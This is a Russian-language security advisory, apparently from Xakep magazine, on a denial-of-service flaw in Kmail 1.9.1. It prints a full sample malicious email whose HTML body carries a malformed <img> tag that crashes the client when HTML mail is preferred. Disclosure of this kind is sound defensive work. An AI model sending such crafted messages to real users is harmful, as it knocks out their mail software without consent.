Хакер #305. Многошаговые SQL-инъекции
Программа: Kmail 1.9.1
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в обработке некорректно составленного <img> тэга при разборе HTML письма. Атакующий может отправить специально сформированное письмо, что приведет к краху системы. Успешное эксплуатирование уязвимости требует включение функциональности разбора HTML писем: Settings -> Configure Kmail ->Security -> and tick Prefer HTML to Plain Text.
Пример злонамеренного письма:
return-Path: <nnp@torvalds>
X-Original-To: nnp
Delivered-To: nnp@torvalds
Received: by torvalds (Postfix, from userid 1000)
id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST)
To: nnp@torvalds
Message-Id: <20060827000335.2341B7CC25@torvalds>
Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST)
Content-Type: text/html
From: nnp@torvalds (nnp)
Status: RO
X-Status: UC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
<html>
<IMG SRC=file:"" />
</html>